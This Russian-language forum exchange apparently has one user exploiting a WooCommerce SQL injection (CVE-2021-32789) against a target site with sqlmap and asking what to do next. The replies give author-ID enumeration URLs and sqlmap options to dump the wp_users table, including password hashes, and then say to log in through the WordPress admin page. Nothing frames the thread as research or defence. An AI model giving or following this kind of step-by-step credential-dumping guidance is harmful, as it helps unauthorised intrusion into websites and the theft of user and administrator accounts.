Привет, раскручиваю CVE-2021-32789 WooCommerce sql injection, при помощи sqlmap, получил имя баз данных и таблицы, а также версию mysql, подскажите куда дальше двигаться? Пытался просмотреть пользователей из таблиц, но не получается.
Можешь подробнее, пожалуйста?Посмотри /?author=1
Потом в таблицу wp_users > /wp_admin
Спасибо!www.site.com/blog/?author=1 или www.site.com/?author=1 от таргета зависит где там WP , он покажет пост админа с id=1
в скульмапе такие запрос
-D database -T wp_users --columns (или -C ID,user_name,user_pass если не ошибаюсь, не помню уже) --dump
потом идешь в www.site.com/wp_login.php или www.site.com/wp_admin он тебе редерект сделает на вход